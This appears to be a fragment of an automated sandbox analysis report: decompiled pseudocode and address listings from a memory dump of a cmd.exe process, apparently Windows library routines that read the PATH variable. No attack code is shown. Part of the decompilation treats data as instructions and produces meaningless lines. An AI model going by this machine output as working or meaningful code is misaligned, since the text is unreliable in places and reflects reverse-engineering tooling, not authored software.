0x036eb969
0x036eb96d
0x036eb96d
0x036eb970
0x036eb974
0x036eb97a
0x036ebadf
0x036ebadf
0x036ebae2
0x036ebae4
0x036ebae6
0x036ebaf0
0x03732cb8
0x036ebaf6
0x036ebaf6
0x036ebaf6
0x036ebafd
0x036ebb1f
0x036ebb1f
0x036ebaff
0x036ebb00
0x036ebb00
0x036ebb03
0x036ebb03
0x036ebacb
0x036ebacf
0x036ebad0
0x036ebad1
0x036ebadc
0x036ebadc
0x036eb980
0x036eb980
0x036eb988
0x036eb98b
0x036eb98d
0x036eb990
0x036eb993
0x036eb999
0x036eb99b
0x036eb9a1
0x036eb9a5
0x036eb9aa
0x036eb9b0
0x036eb9bb
0x036eb9c0
0x036eb9c3
0x036eb9ca
0x036eb9cc
0x036eb9cf
0x036eb9d3
0x036eb9d7
0x036eba94
0x036eba94
0x036eba98
0x036ebaa3
0x03732ccb
0x036ebaa9
0x036ebaa9
0x036ebaa9
0x036ebab1
0x03732cd5
0x03732cdd
0x03732cdd
0x036ebabb
0x036ebabc
0x036ebac2
0x036ebac3
0x036ebac3
0x036ebac6
0x00000000
0x036eb9dd
0x036eb9dd
0x036eb9e7
0x036eb9e7
0x036eb9ec
0x036eb9ec
0x036eb9f1
0x036eb9f5
0x036eb9fa
0x036eba00
0x036eba0c
0x036eba10
0x036eba10
0x036eba12
0x036eba18
0x00000000
0x00000000
0x036ebb26
0x036ebb26
0x036eba1e
0x036eba1e
0x036eba23
0x036eba25
0x036eba2c
0x036eba30
0x036eba35
0x036eba35
0x036eba41
0x036eba46
0x036eba4c
0x036eba50
0x036eba54
0x036eba6a
0x036eba6e
0x036eba70
0x036eba74
0x036eba78
0x036eba7a
0x036eba7c
0x036eba8e
0x036eba90
0x036eba92
0x036ebb14
0x036ebb14
0x036ebb16
0x036ebb16
0x00000000
0x036eba7c
0x036ebb0a
0x036ebb0d
0x00000000
0x00000000
0x00000000
0x036ebb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 036EB9A5

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 6d3bc998bb48c5140bc005c9706b3f9d597a5e288fffa27a1c3c49039208164f
Instruction ID: 104974ae2f4cfac862723fabf139bf015ff80afd499336a36bca7a35929d4c9a
Opcode Fuzzy Hash: 6d3bc998bb48c5140bc005c9706b3f9d597a5e288fffa27a1c3c49039208164f
Instruction Fuzzy Hash: 53516C71609345DFCB20DF29C180A2AFBF9FB89600F18896EF5859B355D771E848CB92

Uniqueness

Uniqueness Score: -1.00%

Function 036F2581 Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 82%

			E036F2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t238;
				signed int _t242;
				signed int _t244;
				signed int _t247;
				signed int _t249;
				intOrPtr _t251;
				signed int _t254;
				signed int _t261;
				signed int _t264;
				signed int _t273;
				intOrPtr _t279;
				signed int _t281;
				signed int _t283;
				void* _t284;
				signed int _t287;
				signed int _t288;
				unsigned int _t291;
				signed int _t295;
				void* _t296;
				signed int _t297;
				signed int _t301;
				intOrPtr _t313;
				signed int _t322;
				signed int _t324;
				signed int _t325;
				signed int _t329;
				signed int _t330;
				intOrPtr* _t333;
				void* _t334;
				signed int _t336;
				signed int _t338;
				void* _t340;
				signed int _t342;
				void* _t343;
				signed int _t346;
				void* _t347;

				_t338 = _t342;
				_t343 = _t342 - 0x4c;
				_v8 =  *0x37bd360 ^ _t338;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t329 = 0x37bb2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t291 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t347 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t279 = 0x48;
				_t311 = 0 | _t347 == 0x00000000;
				_t322 = 0;
				_v37 = _t347 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t279 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t330 = 0xc0000106;
						goto L32;
					} else {
						_t329 = L036E4620(_t291,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t279);
						_v52 = _t329;
						__eflags = _t329;
						if(_t329 == 0) {
							_t330 = 0xc0000017;
							goto L32;
						} else {
							 *(_t329 + 0x44) =  *(_t329 + 0x44) & 0x00000000;
							_t50 = _t329 + 0x48; // 0x48
							_t324 = _t50;
							_t311 = _v32;
							 *((intOrPtr*)(_t329 + 0x3c)) = _t279;
							_t281 = 0;
							 *((short*)(_t329 + 0x30)) = _v48;
							__eflags = _t311;
							if(_t311 != 0) {
								 *(_t329 + 0x18) = _t324;
								__eflags = _t311 - 0x37b8478;
								 *_t329 = ((0 | _t311 == 0x037b8478) - 0x00000001 & 0xfffffffb) + 7;
								E0370F3E0(_t324,  *((intOrPtr*)(_t311 + 4)),  *_t311 & 0x0000ffff);
								_t311 = _v32;
								_t343 = _t343 + 0xc;
								_t281 = 1;
								__eflags = _a8;
								_t324 = _t324 + (( *_t311 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t273 = E037539F2(_t324);
									_t311 = _v32;
									_t324 = _t273;
								}
							}
							_t295 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t330 = _v68;
								__eflags = 0;
								 *((short*)(_t324 - 2)) = 0;
								goto L32;
							} else {
								_t283 = _t329 + _t281 * 4;
								_v56 = _t283;
								do {
									__eflags = _t311;
									if(_t311 != 0) {
										_t238 =  *(_v60 + _t295 * 4);
										__eflags = _t238;
										if(_t238 == 0) {
											goto L30;
										} else {
											__eflags = _t238 == 5;
											if(_t238 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t283 =  *(_v60 + _t295 * 4);
										 *(_t283 + 0x18) = _t324;
										_t242 =  *(_v60 + _t295 * 4);
										__eflags = _t242 - 8;
										if(_t242 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t242 * 4 +  &M036F2959))) {
												case 0:
													__ax =  *0x37b8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0370F3E0(__edi,  *0x37b848c, __ax & 0x0000ffff);
														__eax =  *0x37b8488 & 0x0000ffff;
														goto L26;
													}
													goto L114;
												case 1:
													L45:
													E0370F3E0(_t324, _v80, _v64);
													_t268 = _v64;
													goto L26;
												case 2:
													 *0x37b8480 & 0x0000ffff = E0370F3E0(__edi,  *0x37b8484,  *0x37b8480 & 0x0000ffff);
													__eax =  *0x37b8480 & 0x0000ffff;
													__eax = ( *0x37b8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0370F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L114;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0370F3E0(_t324, _v76, _v36);
														_t268 = _v36;
													}
													L26:
													_t343 = _t343 + 0xc;
													_t324 = _t324 + (_t268 >> 1) * 2 + 2;
													__eflags = _t324;
													L27:
													_push(0x3b);
													_pop(_t270);
													 *((short*)(_t324 - 2)) = _t270;
													goto L28;
												case 6:
													__ebx = "\\WWw\\WWw";
													__eflags = __ebx - "\\WWw\\WWw";
													if(__ebx != "\\WWw\\WWw") {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0370F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - "\\WWw\\WWw";
														} while (__ebx != "\\WWw\\WWw");
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x37b8478 & 0x0000ffff = E0370F3E0(__edi,  *0x37b847c,  *0x37b8478 & 0x0000ffff);
													__eax =  *0x37b8478 & 0x0000ffff;
													__eax = ( *0x37b8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E037539F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x37b6e58 & 0x0000ffff = E0370F3E0(__edi,  *0x37b6e5c,  *0x37b6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x37b6e58 & 0x0000ffff;
													__eax = ( *0x37b6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t295 = _v16;
													_t311 = _v32;
													L29:
													_t283 = _t283 + 4;
													__eflags = _t283;
													_v56 = _t283;
													goto L30;
											}
										}
									}
									goto L114;
									L30:
									_t295 = _t295 + 1;
									_v16 = _t295;
									__eflags = _t295 - _v48;
								} while (_t295 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t242 =  *(_v60 + _t322 * 4);
						if(_t242 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t242 * 4 +  &M036F2935))) {
							case 0:
								__ax =  *0x37b8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t311 =  &_v64;
								_v80 = E036F2E3E(0,  &_v64);
								_t279 = _t279 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x37b8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x37b8480;
									goto L86;
								}
								goto L14;
							case 3:
								__eax = E036DEEF0(0x37b79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L63();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E036DEB70(__ecx, 0x37b79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t216 = _v72;
											__eflags = _t216;
											if(_t216 != 0) {
												L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t216);
											}
											_t217 = _v52;
											__eflags = _t217;
											if(_t217 != 0) {
												__eflags = _t330;
												if(_t330 < 0) {
													L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t217);
													_t217 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t291 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x37b7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L036E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E036DEB70(__ecx, 0x37b79a0);
										__eax = _v52;
										L36:
										_pop(_t323);
										_pop(_t331);
										__eflags = _v8 ^ _t338;
										_pop(_t280);
										return E0370B640(_t217, _t280, _v8 ^ _t338, _t311, _t323, _t331);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L63();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L114;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t275 = _v56;
								if(_v56 != 0) {
									_t311 =  &_v36;
									_t277 = E036F2E3E(_t275,  &_v36);
									_t291 = _v36;
									_v76 = _t277;
								}
								if(_t291 == 0) {
									goto L44;
								} else {
									_t279 = _t279 + 2 + _t291;
								}
								goto L14;
							case 6:
								__eax =  *0x37b5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x37b8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x37b8478;
									L86:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x37b6e58 & 0x0000ffff;
								__eax = ( *0x37b6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t322 = _t322 + 1;
								if(_t322 >= _v48) {
									goto L16;
								} else {
									_t311 = _v37;
									goto L1;
								}
								goto L114;
						}
					}
					L56:
					_t296 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					asm("outsd");
					asm("outsd");
					_t346 = _t343 +  *((intOrPtr*)(_t329 + 0x28)) + _t242;
					asm("daa");
					asm("outsd");
					_t340 = _t338 +  *_t329;
					asm("es outsd");
					asm("outsd");
					_t244 = _t242 +  *((intOrPtr*)(_t329 + 0x28)) +  *0x1f036f26;
					__eflags = _t244;
					_pop(_t284);
					if(_t244 < 0) {
						_t107 = _t244;
						_t244 = _t346;
						_t346 = _t107;
						_t108 = _t324 + 3;
						 *_t108 =  *(_t324 + 3) - _t296;
						__eflags =  *_t108;
					}
					 *(_t324 + 3) =  *(_t324 + 3) - _t340;
					 *_t244 =  *_t244 - 0x6f;
					_t333 = _t329 +  *0x203735b + _t329 +  *0x203735b;
					asm("daa");
					asm("outsd");
					 *(_t324 + 3) =  *(_t324 + 3) - _t296;
					_t334 = _t333 - 1;
					 *(_t324 + 3) =  *(_t324 + 3) - _t296;
					asm("daa");
					asm("outsd");
					__eflags = _t284 +  *_t333 + _t244;
					_pop(_t287);
					if(_t284 +  *_t333 + _t244 < 0) {
						asm("outsd");
					}
					_t335 = _t334 +  *((intOrPtr*)(_t346 + _t287 * 2));
					__eflags = _t334 +  *((intOrPtr*)(_t346 + _t287 * 2));
					if(_t334 +  *((intOrPtr*)(_t346 + _t287 * 2)) < 0) {
						asm("int3");
						asm("int3");
						asm("int3");
					}
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x379ff00);
					E0371D08C(_t287, _t324, _t335);
					_v44 =  *[fs:0x18];
					_t325 = 0;
					 *_a24 = 0;
					_t288 = _a12;
					__eflags = _t288;
					if(_t288 == 0) {
						_t247 = 0xc0000100;
					} else {
						_v8 = 0;
						_t336 = 0xc0000100;
						_v52 = 0xc0000100;
						_t249 = 4;
						while(1) {
							_v40 = _t249;
							__eflags = _t249;
							if(_t249 == 0) {
								break;
							}
							_t301 = _t249 * 0xc;
							_v48 = _t301;
							__eflags = _t288 -  *((intOrPtr*)(_t301 + 0x36a1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t264 = E0370E5C0(_a8,  *((intOrPtr*)(_t301 + 0x36a1668)), _t288);
									_t346 = _t346 + 0xc;
									__eflags = _t264;
									if(__eflags == 0) {
										_t336 = E037451BE(_t288,  *((intOrPtr*)(_v48 + 0x36a166c)), _a16, _t325, _t336, __eflags, _a20, _a24);
										_v52 = _t336;
										break;
									} else {
										_t249 = _v40;
										goto L68;
									}
									goto L76;
								} else {
									L68:
									_t249 = _t249 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t336;
						__eflags = _t336;
						if(_t336 < 0) {
							__eflags = _t336 - 0xc0000100;
							if(_t336 == 0xc0000100) {
								_t297 = _a4;
								__eflags = _t297;
								if(_t297 != 0) {
									_v36 = _t297;
									__eflags =  *_t297 - _t325;
									if( *_t297 == _t325) {
										_t336 = 0xc0000100;
										goto L82;
									} else {
										_t313 =  *((intOrPtr*)(_v44 + 0x30));
										_t251 =  *((intOrPtr*)(_t313 + 0x10));
										__eflags =  *((intOrPtr*)(_t251 + 0x48)) - _t297;
										if( *((intOrPtr*)(_t251 + 0x48)) == _t297) {
											__eflags =  *(_t313 + 0x1c);
											if( *(_t313 + 0x1c) == 0) {
												L112:
												_t336 = E036F2AE4( &_v36, _a8, _t288, _a16, _a20, _a24);
												_v32 = _t336;
												__eflags = _t336 - 0xc0000100;
												if(_t336 != 0xc0000100) {
													goto L75;
												} else {
													_t325 = 1;
													_t297 = _v36;
													goto L81;
												}
											} else {
												_t254 = E036D6600( *(_t313 + 0x1c));
												__eflags = _t254;
												if(_t254 != 0) {
													goto L112;
												} else {
													_t297 = _a4;
													goto L81;
												}
											}
										} else {
											L81:
											_t336 = E036F2C50(_t297, _a8, _t288, _a16, _a20, _a24, _t325);
											L82:
											_v32 = _t336;
											goto L75;
										}
									}
									goto L114;
								} else {
									E036DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t336 = _a24;
									_t261 = E036F2AE4( &_v36, _a8, _t288, _a16, _a20, _t336);
									_v32 = _t261;
									__eflags = _t261 - 0xc0000100;
									if(_t261 == 0xc0000100) {
										_v32 = E036F2C50(_v36, _a8, _t288, _a16, _a20, _t336, 1);
									}
									_v8 = _t325;
									E036F2ACB();
								}
							}
						}
						L75:
						_v8 = 0xfffffffe;
						_t247 = _t336;
					}
					L76:
					return E0371D0D1(_t247);
				}
				L114:
			}

0x036f2584
0x036f2586
0x036f2590
0x036f2596
0x036f2597
0x036f2598
0x036f2599
0x036f259e
0x036f25a4
0x036f25a9
0x036f25ac
0x036f25ae
0x036f25b1
0x036f25b2
0x036f25b5
0x036f25b8
0x036f25bb
0x036f25bc
0x036f25bf
0x036f25c2
0x036f25c5
0x036f25c6
0x036f25cb
0x036f25ce
0x036f25d8
0x036f25db
0x036f25dd
0x036f25de
0x036f25e1
0x036f25e3
0x036f25e9
0x036f26da
0x036f26da
0x036f26dd
0x036f26e2
0x03735b56
0x00000000
0x036f26e8
0x036f26f9
0x036f26fb
0x036f26fe
0x036f2700
0x03735b60
0x00000000
0x036f2706
0x036f2706
0x036f270a
0x036f270a
0x036f270d
0x036f2713
0x036f2716
0x036f2718
0x036f271c
0x036f271e
0x03735b6c
0x03735b6f
0x03735b7f
0x03735b89
0x03735b8e
0x03735b93
0x03735b96
0x03735b9c
0x03735ba0
0x03735ba3
0x03735bab
0x03735bb0
0x03735bb3
0x03735bb3
0x03735ba3
0x036f2724
0x036f2726
0x036f2729
0x036f272c
0x036f279d
0x036f279d
0x036f27a0
0x036f27a2
0x00000000
0x036f272e
0x036f272e
0x036f2731
0x036f2734
0x036f2734
0x036f2736
0x03735bc1
0x03735bc1
0x03735bc4
0x00000000
0x03735bca
0x03735bca
0x03735bcd
0x00000000
0x03735bd3
0x00000000
0x03735bd3
0x03735bcd
0x036f273c
0x036f273c
0x036f2742
0x036f2747
0x036f274a
0x036f274d
0x036f2750
0x00000000
0x036f2756
0x036f2756
0x00000000
0x036f2902
0x036f2908
0x036f290b
0x00000000
0x036f2911
0x036f291c
0x036f2921
0x00000000
0x036f2921
0x00000000
0x00000000
0x036f2880
0x036f2887
0x036f288c
0x00000000
0x00000000
0x036f2805
0x036f280a
0x036f2814
0x036f2816
0x00000000
0x00000000
0x036f281e
0x036f2821
0x036f2823
0x00000000
0x036f2829
0x036f2829
0x036f2831
0x036f283c
0x036f283e
0x00000000
0x036f283e
0x00000000
0x00000000
0x036f284e
0x036f2850
0x036f2851
0x036f2854
0x036f2857
0x036f285a
0x036f285c
0x036f285d
0x00000000
0x00000000
0x036f275d
0x036f2761
0x00000000
0x036f2767
0x036f276e
0x036f2773
0x036f2773
0x036f2776
0x036f2778
0x036f277e
0x036f277e
0x036f2781
0x036f2781
0x036f2783
0x036f2784
0x00000000
0x00000000
0x03735bd8
0x03735bde
0x03735be4
0x03735be6
0x03735be8
0x03735be9
0x03735bee
0x03735bf8
0x03735bff
0x03735c01
0x03735c04
0x03735c07
0x03735c0b
0x03735c0d
0x03735c0d
0x03735c15
0x03735c18
0x03735c1b
0x03735c1b
0x03735c1e
0x00000000
0x00000000
0x036f28c3
0x036f28c8
0x036f28d2
0x036f28d4
0x036f28d8
0x036f28db
0x03735c26
0x03735c28
0x03735c2d
0x03735c2d
0x00000000
0x00000000
0x03735c34
0x03735c36
0x03735c49
0x03735c4e
0x03735c54
0x03735c5b
0x03735c5d
0x03735c60
0x036f2788
0x036f2788
0x036f278b
0x036f278e
0x036f278e
0x036f278e
0x036f2791
0x00000000
0x00000000
0x036f2756
0x036f2750
0x00000000
0x036f2794
0x036f2794
0x036f2795
0x036f2798
0x036f2798
0x00000000
0x036f2734
0x036f272c
0x036f2700
0x036f25ef
0x036f25ef
0x036f25ef
0x036f25f2
0x036f25f8
0x00000000
0x00000000
0x036f25fe
0x00000000
0x036f28e6
0x036f28ec
0x036f28ef
0x036f28f5
0x036f28f8
0x036f28f8
0x00000000
0x036f28f8
0x00000000
0x00000000
0x036f2866
0x036f2866
0x036f2876
0x036f2879
0x00000000
0x00000000
0x036f27e0
0x036f27e7
0x036f27e9
0x036f27eb
0x03735afd
0x00000000
0x03735afd
0x00000000
0x00000000
0x036f2633
0x036f2638
0x036f263b
0x036f263c
0x036f263e
0x036f2640
0x036f2642
0x036f2647
0x036f2649
0x036f264e
0x036f2650
0x036f2653
0x036f2659
0x036f26a2
0x036f26a7
0x036f26ac
0x036f26b2
0x03735b11
0x03735b15
0x03735b17
0x00000000
0x036f26b8
0x036f26b8
0x036f26ba
0x036f27a6
0x036f27a6
0x036f27a9
0x036f27ab
0x036f27b9
0x036f27b9
0x036f27be
0x036f27c1
0x036f27c3
0x036f27c5
0x036f27c7
0x03735c74
0x03735c79
0x03735c79
0x036f27c7
0x00000000
0x036f26c0
0x036f26c0
0x036f26c3
0x036f26c6
0x036f26c6
0x036f26c9
0x036f26c9
0x00000000
0x036f26c9
0x036f26ba
0x036f265b
0x036f265b
0x036f265e
0x036f2667
0x036f266d
0x036f2677
0x036f267c
0x036f267f
0x036f2681
0x03735b49
0x03735b4e
0x036f27cd
0x036f27d0
0x036f27d1
0x036f27d2
0x036f27d4
0x036f27dd
0x036f2687
0x036f2687
0x036f268a
0x036f268b
0x036f268e
0x036f268f
0x036f2691
0x036f2696
0x036f2698
0x036f269d
0x036f269f
0x00000000
0x036f269f
0x036f2681
0x00000000
0x00000000
0x036f2846
0x00000000
0x00000000
0x036f2605
0x036f260a
0x036f260c
0x036f2611
0x036f2616
0x036f2619
0x036f2619
0x036f261e
0x00000000
0x036f2624
0x036f2627
0x036f2627
0x00000000
0x00000000
0x03735b1f
0x00000000
0x00000000
0x036f2894
0x036f289b
0x036f289d
0x036f28a1
0x03735b2b
0x03735b2e
0x03735b2e
0x036f28a7
0x036f28a9
0x03735b04
0x03735b09
0x03735b09
0x03735b09
0x00000000
0x00000000
0x03735b35
0x03735b3c
0x036f28fb
0x036f28fb
0x036f26cc
0x036f26cc
0x036f26d0
0x00000000
0x036f26d2
0x036f26d2
0x00000000
0x036f26d2
0x00000000
0x00000000
0x036f25fe
0x036f292d
0x036f292f
0x036f2930
0x036f2935
0x036f2937
0x036f293b
0x036f293c
0x036f293e
0x036f293f
0x036f2940
0x036f2942
0x036f2947
0x036f2948
0x036f2948
0x036f294e
0x036f294f
0x036f2951
0x036f2951
0x036f2951
0x036f2952
0x036f2952
0x036f2952
0x036f2952
0x036f295a
0x036f295d
0x036f2960
0x036f2962
0x036f2963
0x036f2966
0x036f2969
0x036f296a
0x036f296e
0x036f296f
0x036f2970
0x036f2972
0x036f2973
0x036f2977
0x036f2977
0x036f2978
0x036f2978
0x036f297b
0x036f297d
0x036f297e
0x036f297f
0x036f297f
0x036f2980
0x036f2981
0x036f2982
0x036f2983
0x036f2984
0x036f2985
0x036f2986
0x036f2987
0x036f2988
0x036f2989
0x036f298a
0x036f298b
0x036f298c
0x036f298d
0x036f298e
0x036f298f
0x036f2990
0x036f2992
0x036f2997
0x036f29a3
0x036f29a6
0x036f29ab
0x036f29ad
0x036f29b0
0x036f29b2
0x03735c80
0x036f29b8
0x036f29b8
0x036f29bb
0x036f29c0
0x036f29c5
0x036f29c6
0x036f29c6
0x036f29c9
0x036f29cb
0x00000000
0x00000000
0x036f29cd
0x036f29d0
0x036f29d9
0x036f29db
0x036f29dd
0x036f2a7f
0x036f2a84
0x036f2a87
0x036f2a89
0x03735ca1
0x03735ca3
0x00000000
0x036f2a8f
0x036f2a8f
0x00000000
0x036f2a8f
0x00000000
0x036f29e3
0x036f29e3
0x036f29e3
0x00000000
0x036f29e3
0x036f29dd
0x00000000
0x036f29db
0x036f29e6
0x036f29e9
0x036f29eb
0x036f29ed
0x036f29f3
0x036f29f5
0x036f29f8
0x036f29fa
0x036f2a97
0x036f2a9a
0x036f2a9d
0x036f2add
0x00000000
0x036f2a9f
0x036f2aa2
0x036f2aa5
0x036f2aa8
0x036f2aab
0x03735cab
0x03735caf
0x03735cc5
0x03735cda
0x03735cdc
0x03735cdf
0x03735ce5
0x00000000
0x03735ceb
0x03735ced
0x03735cee
0x00000000
0x03735cee
0x03735cb1
0x03735cb4
0x03735cb9
0x03735cbb
0x00000000
0x03735cbd
0x03735cbd
0x00000000
0x03735cbd
0x03735cbb
0x036f2ab1
0x036f2ab1
0x036f2ac4
0x036f2ac6
0x036f2ac6
0x00000000
0x036f2ac6
0x036f2aab
0x00000000
0x036f2a00
0x036f2a09
0x036f2a0e
0x036f2a21
0x036f2a24
0x036f2a35
0x036f2a3a
0x036f2a3d
0x036f2a42
0x036f2a59
0x036f2a59
0x036f2a5c
0x036f2a5f
0x036f2a5f
0x036f29fa
0x036f29f3
0x036f2a64
0x036f2a64
0x036f2a6b
0x036f2a6b
0x036f2a6d
0x036f2a72
0x036f2a72
0x00000000

Strings

PATH, xrefs: 036F2642, 036F2691

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: 102d597ea9a3cd785f3df075141143600c2566dec9922a799386c0be5ccdcaf0
Instruction ID: b6d419e244e20db36f39b15277959e1530a3b2ad7f5461d7dd79eeafe244f7f0
Opcode Fuzzy Hash: 102d597ea9a3cd785f3df075141143600c2566dec9922a799386c0be5ccdcaf0
Instruction Fuzzy Hash: 59C1A2B9E00219EFCB14DFA9D994BAEF7B5FF48710F184429E501AB290D734A942CF64

Uniqueness

Uniqueness Score: -1.00%

Function 036FFAB0 Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E036FFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
